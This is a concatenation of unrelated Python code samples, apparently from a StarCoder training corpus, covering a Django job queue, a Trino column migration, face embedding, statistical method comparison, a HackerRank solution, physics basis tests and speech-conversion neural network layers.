user: "models.User",
project_file: str,
overwrite_conflicts: bool,
delta_ids: List[str] = None,
) -> Optional["models.ApplyJob"]:
"""Apply a deltas"""
logger.info(
f"Requested apply_deltas on {project} with {project_file}; overwrite_conflicts: {overwrite_conflicts}; delta_ids: {delta_ids}"
)
apply_jobs = models.ApplyJob.objects.filter(
project=project,
status=[
models.Job.Status.PENDING,
models.Job.Status.QUEUED,
],
)
if len(apply_jobs) > 0:
return apply_jobs[0]
pending_deltas = models.Delta.objects.filter(
project=project,
last_status=models.Delta.Status.PENDING,
)
if delta_ids is not None:
pending_deltas = pending_deltas.filter(pk__in=delta_ids)
if len(pending_deltas) == 0:
return None
apply_job = models.ApplyJob.objects.create(
project=project,
created_by=user,
overwrite_conflicts=overwrite_conflicts,
)
return apply_job
def repackage(project: "models.Project", user: "models.User") -> "models.PackageJob":
"""Returns an unfinished or freshly created package job.
Checks if there is already an unfinished package job and returns it,
or creates a new package job and returns it.
"""
if not project.project_filename:
raise exceptions.NoQGISProjectError()
# Check if active package job already exists
query = Q(project=project) & (
Q(status=models.PackageJob.Status.PENDING)
| Q(status=models.PackageJob.Status.QUEUED)
| Q(status=models.PackageJob.Status.STARTED)
)
if models.PackageJob.objects.filter(query).count():
return models.PackageJob.objects.get(query)
package_job = models.PackageJob.objects.create(project=project, created_by=user)
return package_job
def repackage_if_needed(
project: "models.Project", user: "models.User"
) -> "models.PackageJob":
if not project.project_filename:
raise exceptions.NoQGISProjectError()
if project.needs_repackaging:
package_job = repackage(project, user)
else:
package_job = (
models.PackageJob.objects.filter(project=project)
.order_by("started_at")
.get()
)
return package_job
|
StarcoderdataPython
|
6662594
|
<filename>scripts/cji_scripts/migrate_trino.py
#! /usr/bin/env python3.8
import logging
import os
import trino
logging.basicConfig(format="%(asctime)s: %(message)s", datefmt="%m/%d/%Y %I:%M:%S %p", level=logging.INFO)
PRESTO_HOST = os.environ.get("PRESTO_HOST", "localhost")
PRESTO_USER = os.environ.get("PRESTO_USER", "admin")
PRESTO_CATALOG = os.environ.get("PRESTO_CATALOG", "hive")
try:
PRESTO_PORT = int(os.environ.get("PRESTO_PORT", "8080"))
except ValueError:
PRESTO_PORT = 8080
CONNECT_PARAMS = {
"host": PRESTO_HOST,
"port": PRESTO_PORT,
"user": PRESTO_USER,
"catalog": PRESTO_CATALOG,
"schema": "default",
}
def get_schemas():
sql = "SELECT schema_name FROM information_schema.schemata"
schemas = run_trino_sql(sql, CONNECT_PARAMS)
schemas = [
schema
for listed_schema in schemas
for schema in listed_schema
if schema not in ["default", "information_schema"]
]
return schemas
def run_trino_sql(sql, conn_params):
with trino.dbapi.connect(**conn_params) as conn:
cur = conn.cursor()
cur.execute(sql)
result = cur.fetchall()
return result
def drop_tables(tables, conn_params):
for table_name in tables:
logging.info(f"dropping table {table_name}")
sql = f"DROP TABLE IF EXISTS {table_name}"
try:
result = run_trino_sql(sql, conn_params)
logging.info("Drop table result: ")
logging.info(result)
except Exception as e:
logging.info(e)
def add_columns_to_table(columns, table, conn_params):
for column in columns:
logging.info(f"adding column {column} to table {table}")
sql = f"ALTER TABLE {table} ADD COLUMN IF NOT EXISTS {column} double"
try:
result = run_trino_sql(sql, conn_params)
logging.info("ALTER TABLE result: ")
logging.info(result)
except Exception as e:
logging.info(e)
def drop_columns_from_table(columns, table, conn_params):
for column in columns:
logging.info(f"Dropping column {column} from table {table}")
sql = f"ALTER TABLE IF EXISTS {table} DROP COLUMN IF EXISTS {column}"
try:
result = run_trino_sql(sql, conn_params)
logging.info("ALTER TABLE result: ")
logging.info(result)
except Exception as e:
logging.info(e)
def main():
logging.info("Running the hive migration for cost model effective cost")
logging.info("fetching schemas")
schemas = get_schemas()
logging.info("Running against the following schemas")
logging.info(schemas)
# tables_to_drop = []
# columns_to_add = []
columns_to_drop = ["project_rank", "data_source_rank"]
for schema in schemas:
CONNECT_PARAMS["schema"] = schema
# logging.info(f"*** dropping tables for schema {schema} ***")
# drop_tables(tables_to_drop, CONNECT_PARAMS)
logging.info(f"*** Dropping columns for schema {schema} ***")
drop_columns_from_table(
columns_to_drop, "reporting_ocpawscostlineitem_project_daily_summary_temp", CONNECT_PARAMS
)
drop_columns_from_table(columns_to_drop, "reporting_ocpawscostlineitem_project_daily_summary", CONNECT_PARAMS)
drop_columns_from_table(
columns_to_drop, "reporting_ocpazurecostlineitem_project_daily_summary_temp", CONNECT_PARAMS
)
drop_columns_from_table(
columns_to_drop, "reporting_ocpazurecostlineitem_project_daily_summary", CONNECT_PARAMS
)
drop_columns_from_table(
columns_to_drop, "reporting_ocpgcpcostlineitem_project_daily_summary_temp", CONNECT_PARAMS
)
drop_columns_from_table(columns_to_drop, "reporting_ocpgcpcostlineitem_project_daily_summary", CONNECT_PARAMS)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
1702749
|
from openface.openface_model import create_model
from openface.preprocess_face_data import load_metadata
from openface.align import AlignDlib
import numpy as np
import cv2
import config
import os
from datetime import datetime
# using pre-trained model
print('load_model')
nn4_small2_pretrained = create_model()
nn4_small2_pretrained.load_weights('models/nn4.small2.v1.h5')
# nn4_small2_pretrained.summary()
start = datetime.now()
# load customDataset
print(config.faceImagesPath)
metadata = load_metadata('faceImages', num=2)
print(metadata)
def load_image(path):
img = cv2.imread(path, 1)
# OpenCV loads images with color channels
# in BGR order. So we need to reverse them
return img[..., ::-1]
# Initialize the OpenFace face alignment utility
aligment = AlignDlib('models/landmarks.dat')
# Align image on face
def align_image(img):
return aligment.align(96, img, aligment.getLargestFaceBoundingBox(img),
landmarkIndices=AlignDlib.OUTER_EYES_AND_NOSE)
# Embedding vectors
good_image_index = []
unfit_image_index = []
embedded = np.zeros((metadata.shape[0], 128))
print('preprocess image')
for i, m in enumerate(metadata):
img = load_image(m.image_path())
img = align_image(img)
try:
# scale RGB values to interval [0,1]
img = (img / 255.).astype(np.float32)
except TypeError:
unfit_image_index.append(i)
print("The image is not Clear to extract the Embeddings")
else:
# obtain embedding vector for image
embedded[i] = nn4_small2_pretrained.predict(np.expand_dims(img, axis=0))[0]
good_image_index.append(i)
stop = datetime.now()
print(stop - start)
metadata = metadata[good_image_index]
print(metadata)
embedded = embedded[good_image_index]
print(embedded)
print('face embedded create complete')
print('save metadata and embedded')
if not os.path.exists(config.faceData):
os.makedirs(config.faceData, exist_ok='True')
# save metadata
np.save(config.faceData+'/metadata.npy', metadata)
# save embedded
np.save(config.faceData+'/embedded.npy', embedded)
|
StarcoderdataPython
|
304071
|
<filename>compare_methods.py
import sem_utils
import numpy as np
import pandas as pd
np.random.seed(4578347)
##setup search parameters:
timeseries_lengths = np.array([30,100,300,1000,3000,10000])
timeseries_rhos = np.array([0.1, 0.3, 0.5, 0.7, 0.9, 0.99])
numrpts = 100
##setup names and estimation functions
method_names = ['Naive', 'BlockAveraging', 'Chodera', 'Sokal', 'AR1_correction', 'AR1_Bayes']
method_functions = [sem_utils.ci_from_independent,
sem_utils.ci_from_blockAveraging,
sem_utils.ci_from_chodera,
sem_utils.ci_from_sokal,
sem_utils.ci_from_autoregressive_correction,
sem_utils.hpd_from_bayesian_estimation]
##setup df to store the results (we are using long format here due to the complicated structure of the search grid)
df = pd.DataFrame(columns=['methodName', 'trueRho', 'timeSeriesLength', 'estMean', 'mean_low', 'mean_high'])
row_num = 0
##do the measurements:
for rho in timeseries_rhos:
for datasize in timeseries_lengths:
for rpt in range(numrpts):
timeseries = sem_utils.gen_correlated_curve(rho, datasize)
estimated_mean = timeseries.mean()
for methodName, function in zip(method_names, method_functions):
mean_low, mean_high = function(timeseries)
results = [methodName, rho, datasize, estimated_mean, mean_low, mean_high]
print(results)
df.loc[row_num] = results
row_num += 1
##save the csv file:
df.to_csv('sem_results.csv')
|
StarcoderdataPython
|
354403
|
<filename>Warm-Up Challenges/CountingValleys.py
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the countingValleys function below.
def countingValleys(n, s):
UD = {'U': 1, 'D': -1}
sea_level = 0
valley = 0
for step in s:
sea_level = sea_level + UD[step]
if not sea_level and step == 'U':
valley += 1
return valley
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
s = input()
result = countingValleys(n, s)
fptr.write(str(result) + '\n')
fptr.close()
|
StarcoderdataPython
|
266052
|
<gh_stars>100-1000
from __future__ import print_function, division
import sys,os
quspin_path = os.path.join(os.getcwd(),"../")
sys.path.insert(0,quspin_path)
from quspin.operators import hamiltonian
from quspin.basis import spin_basis_general, boson_basis_general, spinless_fermion_basis_general, spinful_fermion_basis_general
import numpy as np
import scipy.sparse as sp
from quspin.operators._make_hamiltonian import _consolidate_static
#
###### define model parameters ######
J1=1.0 # spin=spin interaction
J2=0.5 # magnetic field strength
Lx, Ly = 4, 2 # linear dimension of 2d lattice
N_2d = Lx*Ly # number of sites
#
###### setting up user-defined symmetry transformations for 2d lattice ######
s = np.arange(N_2d) # sites [0,1,2,....]
x = s%Lx # x positions for sites
y = s//Lx # y positions for sites
T_x = (x+1)%Lx + Lx*y # translation along x-direction
T_y = x +Lx*((y+1)%Ly) # translation along y-direction
T_a = (x+1)%Lx + Lx*((y+1)%Ly) # translation along anti-diagonal
T_d = (x-1)%Lx + Lx*((y+1)%Ly) # translation along diagonal
R = np.rot90(s.reshape(Lx,Ly), axes=(0,1)).reshape(N_2d) # rotate anti-clockwise
P_x = x + Lx*(Ly-y-1) # reflection about x-axis
P_y = (Lx-x-1) + Lx*y # reflection about y-axis
Z = -(s+1) # spin inversion
#####
# setting up site-coupling lists
J1_list=[[J1,i,T_x[i]] for i in range(N_2d)] + [[J1,i,T_y[i]] for i in range(N_2d)]
J2_list=[[J2,i,T_d[i]] for i in range(N_2d)] + [[J2,i,T_a[i]] for i in range(N_2d)]
#
static=[ ["++",J1_list],["--",J1_list],["zz",J1_list],
["++",J2_list],["--",J2_list],["zz",J2_list]
]
static_spfs=[ ["++|",J1_list],["--|",J1_list], ["|++",J1_list],["|--",J1_list], ["z|z",J1_list],
["++|",J2_list],["--|",J2_list], ["|++",J2_list],["|--",J2_list], ["z|z",J2_list],
]
static_list = _consolidate_static(static)
static_list_spfs = _consolidate_static(static_spfs)
def compare(static_list,basis,basis_op):
for opstr,indx,J in static_list:
ME,bra,ket = basis.Op_bra_ket(opstr,indx,J,np.float64,basis_op.states)
ME_op,row,col = basis_op.Op(opstr,indx,J,np.float64)
np.testing.assert_allclose(bra - basis_op[row],0.0,atol=1E-5,err_msg='failed bra/row in Op_bra_cket test!')
np.testing.assert_allclose(ket - basis_op[col],0.0,atol=1E-5,err_msg='failed ket/col in Op_bra_ket test!')
np.testing.assert_allclose(ME - ME_op,0.0,atol=1E-5,err_msg='failed ME in Op_bra_ket test!')
for Np in [ None, 2, N_2d-1, [N_2d//4,N_2d//8] ]:
basis=spin_basis_general(N_2d, make_basis=False,
Nup=Np,
kxblock=(T_x,0),kyblock=(T_y,0),
pxblock=(P_x,0),pyblock=(P_y,0),
zblock=(Z,0)
)
basis_op=spin_basis_general(N_2d, make_basis=True,
Nup=Np,
kxblock=(T_x,0),kyblock=(T_y,0),
pxblock=(P_x,0),pyblock=(P_y,0),
zblock=(Z,0)
)
compare(static_list,basis,basis_op)
print('passed spins')
basis=spinless_fermion_basis_general(N_2d, make_basis=False,
Nf=Np,
kxblock=(T_x,0),kyblock=(T_y,0),
pxblock=(P_x,0),pyblock=(P_y,0),
)
basis_op=spinless_fermion_basis_general(N_2d, make_basis=True,
Nf=Np,
kxblock=(T_x,0),kyblock=(T_y,0),
pxblock=(P_x,0),pyblock=(P_y,0),
)
compare(static_list,basis,basis_op)
print('passed spinless fermios')
basis=boson_basis_general(N_2d, make_basis=False,
Nb=Np, sps=3,
kxblock=(T_x,0),kyblock=(T_y,0),
pxblock=(P_x,0),pyblock=(P_y,0),
)
basis_op=boson_basis_general(N_2d, make_basis=True,
Nb=Np, sps=3,
kxblock=(T_x,0),kyblock=(T_y,0),
pxblock=(P_x,0),pyblock=(P_y,0),
)
compare(static_list,basis,basis_op)
print('passed bosons')
if Np==None:
Nf=Np
elif type(Np) is list:
Nf=list(zip(Np,Np))
else:
Nf=(Np,Np)
basis=spinful_fermion_basis_general(N_2d, make_basis=False,
Nf=Nf,
kxblock=(T_x,0),kyblock=(T_y,0),
pxblock=(P_x,0),pyblock=(P_y,0),
)
basis_op=spinful_fermion_basis_general(N_2d, make_basis=True,
Nf=Nf,
kxblock=(T_x,0),kyblock=(T_y,0),
pxblock=(P_x,0),pyblock=(P_y,0),
)
compare(static_list_spfs,basis,basis_op)
print('passed spinful fermios')
|
StarcoderdataPython
|
9697800
|
s = str(input('Qual é o seu sexo? [M/F] ')).strip().upper()[0] # [0] só pega a primeira letra
while s not in 'FM':
s = str(input('Sexo inválido! Digite novamente: [M/F] ')).strip().upper()[0]
print('Sexo {} registrado com sucesso!'.format(s))
|
StarcoderdataPython
|
5029368
|
<filename>fine-tune/model/layers.py<gh_stars>100-1000
import torch
from torch.autograd import Variable
from torch import nn
from torch.nn import functional as F
from .basic_layers import sort_batch, ConvNorm, LinearNorm, Attention, tile
from .utils import get_mask_from_lengths
from .beam import Beam, GNMTGlobalScorer
class SpeakerClassifier(nn.Module):
'''
- n layer CNN + PROJECTION
'''
def __init__(self, hparams):
super(SpeakerClassifier, self).__init__()
convolutions = []
for i in range(hparams.SC_n_convolutions):
#parse dim
if i == 0:
in_dim = hparams.encoder_embedding_dim
out_dim = hparams.SC_hidden_dim
elif i == (hparams.SC_n_convolutions-1):
in_dim = hparams.SC_hidden_dim
out_dim = hparams.SC_hidden_dim
conv_layer = nn.Sequential(
ConvNorm(in_dim,
out_dim,
kernel_size=hparams.SC_kernel_size, stride=1,
padding=int((hparams.SC_kernel_size - 1) / 2),
dilation=1, w_init_gain='leaky_relu',
param=0.2),
nn.BatchNorm1d(out_dim),
nn.LeakyReLU(0.2))
convolutions.append(conv_layer)
self.convolutions = nn.ModuleList(convolutions)
self.projection = LinearNorm(hparams.SC_hidden_dim, hparams.pretrain_n_speakers)
self.projection_to_A = LinearNorm(hparams.SC_hidden_dim, 1, bias=False)
def forward(self, x):
# x [B, T, dim]
# -> [B, DIM, T]
hidden = x.transpose(1, 2)
for conv in self.convolutions:
hidden = conv(hidden)
# -> [B, T, dim]
hidden = hidden.transpose(1, 2)
logits = self.projection_to_A(hidden)
return logits
class SpeakerEncoder(nn.Module):
'''
- Simple 2 layer bidirectional LSTM with global mean_pooling
'''
def __init__(self, hparams):
super(SpeakerEncoder, self).__init__()
self.lstm = nn.LSTM(hparams.n_mel_channels, int(hparams.speaker_encoder_hidden_dim / 2),
num_layers=2, batch_first=True, bidirectional=True, dropout=hparams.speaker_encoder_dropout)
self.projection1 = LinearNorm(hparams.speaker_encoder_hidden_dim,
hparams.speaker_embedding_dim,
w_init_gain='tanh')
self.projection2 = LinearNorm(hparams.speaker_embedding_dim,
hparams.pretrain_n_speakers)
def forward(self, x, input_lengths):
'''
x [batch_size, mel_bins, T]
return
logits [batch_size, n_speakers]
embeddings [batch_size, embedding_dim]
'''
x = x.transpose(1,2)
x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths)
x = nn.utils.rnn.pack_padded_sequence(
x_sorted, sorted_lengths.cpu().numpy(), batch_first=True)
self.lstm.flatten_parameters()
outputs, _ = self.lstm(x)
outputs, _ = nn.utils.rnn.pad_packed_sequence(
outputs, batch_first=True)
outputs = torch.sum(outputs,dim=1) / sorted_lengths.unsqueeze(1).float() # mean pooling -> [batch_size, dim]
outputs = F.tanh(self.projection1(outputs))
outputs = outputs[initial_index]
# L2 normalizing #
embeddings = outputs / torch.norm(outputs, dim=1, keepdim=True)
logits = self.projection2(outputs)
return logits, embeddings
def inference(self, x):
x = x.transpose(1,2)
self.lstm.flatten_parameters()
outputs, _ = self.lstm(x)
outputs = torch.sum(outputs,dim=1) / float(outputs.size(1)) # mean pooling -> [batch_size, dim]
outputs = F.tanh(self.projection1(outputs))
embeddings = outputs / torch.norm(outputs, dim=1, keepdim=True)
logits = self.projection2(outputs)
pid = torch.argmax(logits, dim=1)
return pid, embeddings
class MergeNet(nn.Module):
'''
one layer bi-lstm
'''
def __init__(self, hparams):
super(MergeNet, self).__init__()
self.lstm = nn.LSTM(hparams.encoder_embedding_dim, int(hparams.encoder_embedding_dim/2),
num_layers=1, batch_first=True, bidirectional=True)
def forward(self, x, input_lengths):
'''
x [B, T, dim]
'''
x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths)
x = nn.utils.rnn.pack_padded_sequence(
x_sorted, sorted_lengths.cpu().numpy(), batch_first=True)
self.lstm.flatten_parameters()
outputs, _ = self.lstm(x)
outputs, _ = nn.utils.rnn.pad_packed_sequence(
outputs, batch_first=True)
outputs = outputs[initial_index]
return outputs
def inference(self,x):
self.lstm.flatten_parameters()
outputs, _ = self.lstm(x)
return outputs
class AudioEncoder(nn.Module):
'''
- Simple 2 layer bidirectional LSTM
'''
def __init__(self, hparams):
super(AudioEncoder, self).__init__()
if hparams.spemb_input:
input_dim = hparams.n_mel_channels + hparams.speaker_embedding_dim
else:
input_dim = hparams.n_mel_channels
self.lstm1 = nn.LSTM(input_dim,
int(hparams.audio_encoder_hidden_dim / 2),
num_layers=1, batch_first=True, bidirectional=True)
self.lstm2 = nn.LSTM(hparams.audio_encoder_hidden_dim*hparams.n_frames_per_step_encoder,
int(hparams.audio_encoder_hidden_dim / 2),
num_layers=1, batch_first=True, bidirectional=True)
self.concat_hidden_dim = hparams.audio_encoder_hidden_dim*hparams.n_frames_per_step_encoder
self.n_frames_per_step = hparams.n_frames_per_step_encoder
def forward(self, x, input_lengths):
'''
x [batch_size, mel_bins, T]
return [batch_size, T, channels]
'''
x = x.transpose(1, 2)
x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths)
x_packed = nn.utils.rnn.pack_padded_sequence(
x_sorted, sorted_lengths.cpu().numpy(), batch_first=True)
self.lstm1.flatten_parameters()
outputs, _ = self.lstm1(x_packed)
outputs, _ = nn.utils.rnn.pad_packed_sequence(
outputs, batch_first=True, total_length=x.size(1)) # use total_length make sure the recovered sequence length not changed
outputs = outputs.reshape(x.size(0), -1, self.concat_hidden_dim)
output_lengths = torch.ceil(sorted_lengths.float() / self.n_frames_per_step).long()
outputs = nn.utils.rnn.pack_padded_sequence(
outputs, output_lengths.cpu().numpy() , batch_first=True)
self.lstm2.flatten_parameters()
outputs, _ = self.lstm2(outputs)
outputs, _ = nn.utils.rnn.pad_packed_sequence(
outputs, batch_first=True)
return outputs[initial_index], output_lengths[initial_index]
def inference(self, x):
x = x.transpose(1, 2)
self.lstm1.flatten_parameters()
outputs, _ = self.lstm1(x)
outputs = outputs.reshape(1, -1, self.concat_hidden_dim)
self.lstm2.flatten_parameters()
outputs, _ = self.lstm2(outputs)
return outputs
class AudioSeq2seq(nn.Module):
'''
- Simple 2 layer bidirectional LSTM
'''
def __init__(self, hparams):
super(AudioSeq2seq, self).__init__()
self.encoder = AudioEncoder(hparams)
self.decoder_rnn_dim = hparams.encoder_embedding_dim
self.attention_layer = Attention(self.decoder_rnn_dim, hparams.audio_encoder_hidden_dim,
hparams.AE_attention_dim, hparams.AE_attention_location_n_filters,
hparams.AE_attention_location_kernel_size)
self.decoder_rnn = nn.LSTMCell(hparams.symbols_embedding_dim + hparams.audio_encoder_hidden_dim,
self.decoder_rnn_dim)
def _proj(activation):
if activation is not None:
return nn.Sequential(LinearNorm(self.decoder_rnn_dim+hparams.audio_encoder_hidden_dim,
hparams.encoder_embedding_dim,
w_init_gain=hparams.hidden_activation),
activation)
else:
return LinearNorm(self.decoder_rnn_dim+hparams.audio_encoder_hidden_dim,
hparams.encoder_embedding_dim,
w_init_gain=hparams.hidden_activation)
if hparams.hidden_activation == 'relu':
self.project_to_hidden = _proj(nn.ReLU())
elif hparams.hidden_activation == 'tanh':
self.project_to_hidden = _proj(nn.Tanh())
elif hparams.hidden_activation == 'linear':
self.project_to_hidden = _proj(None)
else:
print('Must be relu, tanh or linear.')
assert False
self.project_to_n_symbols= LinearNorm(hparams.encoder_embedding_dim,
hparams.n_symbols + 1) # plus the <eos>
self.eos = hparams.n_symbols
self.activation = hparams.hidden_activation
self.max_len = 100
def initialize_decoder_states(self, memory, mask):
B = memory.size(0)
MAX_TIME = memory.size(1)
self.decoder_hidden = Variable(memory.data.new(
B, self.decoder_rnn_dim).zero_())
self.decoder_cell = Variable(memory.data.new(
B, self.decoder_rnn_dim).zero_())
self.attention_weigths = Variable(memory.data.new(
B, MAX_TIME).zero_())
self.attention_weigths_cum = Variable(memory.data.new(
B, MAX_TIME).zero_())
self.attention_context = Variable(memory.data.new(
B, self.decoder_rnn_dim).zero_())
self.memory = memory
self.processed_memory = self.attention_layer.memory_layer(memory)
self.mask = mask
def map_states(self, fn):
'''
mapping the decoder states using fn
'''
self.decoder_hidden = fn(self.decoder_hidden, 0)
self.decoder_cell = fn(self.decoder_cell, 0)
self.attention_weigths = fn(self.attention_weigths, 0)
self.attention_weigths_cum = fn(self.attention_weigths_cum, 0)
self.attention_context = fn(self.attention_context, 0)
def parse_decoder_outputs(self, hidden, logit, alignments):
# -> [B, T_out + 1, max_time]
alignments = torch.stack(alignments).transpose(0,1)
# [T_out + 1, B, n_symbols] -> [B, T_out + 1, n_symbols]
logit = torch.stack(logit).transpose(0, 1).contiguous()
hidden = torch.stack(hidden).transpose(0, 1).contiguous()
return hidden, logit, alignments
def decode(self, decoder_input):
cell_input = torch.cat((decoder_input, self.attention_context),-1)
self.decoder_hidden, self.decoder_cell = self.decoder_rnn(
cell_input,
(self.decoder_hidden,
self.decoder_cell))
attention_weigths_cat = torch.cat(
(self.attention_weigths.unsqueeze(1),
self.attention_weigths_cum.unsqueeze(1)),dim=1)
self.attention_context, self.attention_weigths = self.attention_layer(
self.decoder_hidden,
self.memory,
self.processed_memory,
attention_weigths_cat,
self.mask)
self.attention_weigths_cum += self.attention_weigths
hidden_and_context = torch.cat((self.decoder_hidden, self.attention_context), -1)
hidden = self.project_to_hidden(hidden_and_context)
# dropout to increasing g
logit = self.project_to_n_symbols(F.dropout(hidden, 0.5, self.training))
return hidden, logit, self.attention_weigths
def forward(self, mel, mel_lengths, decoder_inputs, start_embedding):
'''
decoder_inputs: [B, channel, T]
start_embedding [B, channel]
return
hidden_outputs [B, T+1, channel]
logits_outputs [B, T+1, n_symbols]
alignments [B, T+1, max_time]
'''
memory, memory_lengths = self.encoder(mel, mel_lengths)
decoder_inputs = decoder_inputs.permute(2, 0, 1) # -> [T, B, channel]
decoder_inputs = torch.cat((start_embedding.unsqueeze(0), decoder_inputs), dim=0)
self.initialize_decoder_states(memory,
mask=~get_mask_from_lengths(memory_lengths))
hidden_outputs, logit_outputs, alignments = [], [], []
while len(hidden_outputs) < decoder_inputs.size(0):
decoder_input = decoder_inputs[len(hidden_outputs)]
hidden, logit, attention_weights = self.decode(decoder_input)
hidden_outputs += [hidden]
logit_outputs += [logit]
alignments += [attention_weights]
hidden_outputs, logit_outputs, alignments = \
self.parse_decoder_outputs(
hidden_outputs, logit_outputs, alignments)
return hidden_outputs, logit_outputs, alignments
'''
use beam search ?
'''
def inference_greed(self, x, start_embedding, embedding_table):
'''
decoding the phone sequence using greed algorithm
x [1, mel_bins, T]
start_embedding [1,embedding_dim]
embedding_table nn.Embedding class
return
hidden_outputs [1, ]
'''
MAX_LEN = 100
decoder_input = start_embedding
memory = self.encoder.inference(x)
self.initialize_decoder_states(memory, mask=None)
hidden_outputs, alignments, phone_ids = [], [], []
while True:
hidden, logit, attention_weights = self.decode(decoder_input)
hidden_outputs += [hidden]
alignments += [attention_weights]
phone_id = torch.argmax(logit,dim=1)
phone_ids += [phone_id]
# if reaches the <eos>
if phone_id.squeeze().item() == self.eos:
break
if len(hidden_outputs) == self.max_len:
break
print('Warning! The decoded text reaches the maximum lengths.')
# embedding the phone_id
decoder_input = embedding_table(phone_id) # -> [1, embedding_dim]
hidden_outputs, phone_ids, alignments = \
self.parse_decoder_outputs(hidden_outputs, phone_ids, alignments)
return hidden_outputs, phone_ids, alignments
def inference_beam(self, x, start_embedding, embedding_table,
beam_width=20,):
memory = self.encoder.inference(x).expand(beam_width, -1,-1)
MAX_LEN = 100
n_best = 5
self.initialize_decoder_states(memory, mask=None)
decoder_input = tile(start_embedding, beam_width)
beam = Beam(beam_width, 0, self.eos, self.eos,
n_best=n_best, cuda=True, global_scorer=GNMTGlobalScorer())
hidden_outputs, alignments, phone_ids = [], [], []
for step in range(MAX_LEN):
if beam.done():
break
hidden, logit, attention_weights = self.decode(decoder_input)
logit = F.log_softmax(logit, dim=1)
beam.advance(logit, attention_weights, hidden)
select_indices = beam.get_current_origin()
self.map_states(lambda state, dim: state.index_select(dim, select_indices))
decoder_input = embedding_table(beam.get_current_state())
scores, ks = beam.sort_finished(minimum=n_best)
hyps, attn, hiddens = [], [], []
for i, (times, k) in enumerate(ks[:n_best]):
hyp, att, hid = beam.get_hyp(times, k)
hyps.append(hyp)
attn.append(att)
hiddens.append(hid)
return hiddens[0].unsqueeze(0), hyps[0].unsqueeze(0), attn[0].unsqueeze(0)
class TextEncoder(nn.Module):
"""Encoder module:
- Three 1-d convolution banks
- Bidirectional LSTM
"""
def __init__(self, hparams):
super(TextEncoder, self).__init__()
convolutions = []
for _ in range(hparams.encoder_n_convolutions):
conv_layer = nn.Sequential(
ConvNorm(hparams.encoder_embedding_dim,
hparams.encoder_embedding_dim,
kernel_size=hparams.encoder_kernel_size, stride=1,
padding=int((hparams.encoder_kernel_size - 1) / 2),
dilation=1, w_init_gain='relu'),
nn.BatchNorm1d(hparams.encoder_embedding_dim))
convolutions.append(conv_layer)
self.convolutions = nn.ModuleList(convolutions)
self.lstm = nn.LSTM(hparams.encoder_embedding_dim,
int(hparams.encoder_embedding_dim / 2), 1,
batch_first=True, bidirectional=True)
self.dropout = hparams.text_encoder_dropout
def _proj(activation):
if activation is not None:
return nn.Sequential(LinearNorm(hparams.encoder_embedding_dim,
hparams.encoder_embedding_dim,
w_init_gain=hparams.hidden_activation),
activation)
else:
return LinearNorm(hparams.encoder_embedding_dim,
hparams.encoder_embedding_dim,
w_init_gain=hparams.hidden_activation)
if hparams.hidden_activation == 'relu':
self.projection = _proj(nn.ReLU())
elif hparams.hidden_activation == 'tanh':
self.projection = _proj(nn.Tanh())
elif hparams.hidden_activation == 'linear':
self.projection = _proj(None)
else:
print('Must be relu, tanh or linear.')
assert False
#self.projection = nn.LinearNorm(hparams.encoder_embedding_dim,
# hparams.encoder_embedding_dim,
# w_init_gain='relu') # fusing bi-directional info
def forward(self, x, input_lengths):
'''
x: [batch_size, channel, T]
return [batch_size, T, channel]
'''
for conv in self.convolutions:
x = F.dropout(F.relu(conv(x)), self.dropout, self.training)
# -> [batch_size, T, channel]
x = x.transpose(1, 2)
x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths)
# pytorch tensor are not reversible, hence the conversion
#input_lengths = input_lengths.cpu().numpy()
sorted_lengths = sorted_lengths.cpu().numpy()
x = nn.utils.rnn.pack_padded_sequence(
x_sorted, sorted_lengths, batch_first=True)
self.lstm.flatten_parameters()
outputs, _ = self.lstm(x)
outputs, _ = nn.utils.rnn.pad_packed_sequence(
outputs, batch_first=True)
outputs = self.projection(outputs)
return outputs[initial_index]
def inference(self, x):
for conv in self.convolutions:
x = F.dropout(F.relu(conv(x)), self.dropout, self.training)
x = x.transpose(1, 2)
self.lstm.flatten_parameters()
outputs, _ = self.lstm(x)
outputs = self.projection(outputs)
return outputs
class PostNet(nn.Module):
"""Postnet
- Five 1-d convolution with 512 channels and kernel size 5
"""
def __init__(self, hparams):
super(PostNet, self).__init__()
self.convolutions = nn.ModuleList()
self.convolutions.append(
nn.Sequential(
ConvNorm(hparams.n_mel_channels, hparams.postnet_dim,
kernel_size=hparams.postnet_kernel_size, stride=1,
padding=int((hparams.postnet_kernel_size - 1) / 2),
dilation=1, w_init_gain='tanh'),
nn.BatchNorm1d(hparams.postnet_dim))
)
for i in range(1, hparams.postnet_n_convolutions - 1):
self.convolutions.append(
nn.Sequential(
ConvNorm(hparams.postnet_dim,
hparams.postnet_dim,
kernel_size=hparams.postnet_kernel_size, stride=1,
padding=int((hparams.postnet_kernel_size - 1) / 2),
dilation=1, w_init_gain='tanh'),
nn.BatchNorm1d(hparams.postnet_dim))
)
if hparams.predict_spectrogram:
out_dim = hparams.n_spc_channels
self.projection = LinearNorm(hparams.n_mel_channels, hparams.n_spc_channels, bias=False)
else:
out_dim = hparams.n_mel_channels
self.convolutions.append(
nn.Sequential(
ConvNorm(hparams.postnet_dim, out_dim,
kernel_size=hparams.postnet_kernel_size, stride=1,
padding=int((hparams.postnet_kernel_size - 1) / 2),
dilation=1, w_init_gain='linear'),
nn.BatchNorm1d(out_dim))
)
self.dropout = hparams.postnet_dropout
self.predict_spectrogram = hparams.predict_spectrogram
def forward(self, input):
# input [B, mel_bins, T]
x = input
for i in range(len(self.convolutions) - 1):
x = F.dropout(torch.tanh(self.convolutions[i](x)), self.dropout, self.training)
x = F.dropout(self.convolutions[-1](x), self.dropout, self.training)
if self.predict_spectrogram:
o = x + self.projection(input.transpose(1,2)).transpose(1,2)
else:
o = x + input
return o
|
StarcoderdataPython
|
12818784
|
#!/usr/bin/env python
import sys
f1 = open(sys.argv[1])
f2 = open(sys.argv[2])
res = 0
for l1, l2 in zip(f1, f2):
v1 = float(l1.strip())
v2 = float(l2.strip())
rel_diff = abs(v1 - v2) / abs(v1)
if rel_diff > 10 ** -4:
print "Difference: {} vs {}".format(v1, v2)
res = 1
sys.exit(res)
|
StarcoderdataPython
|
11344288
|
<gh_stars>0
from timemachines.skaters.dlm.dlmunivariate import dlm_univariate_a, dlm_univariate_r3
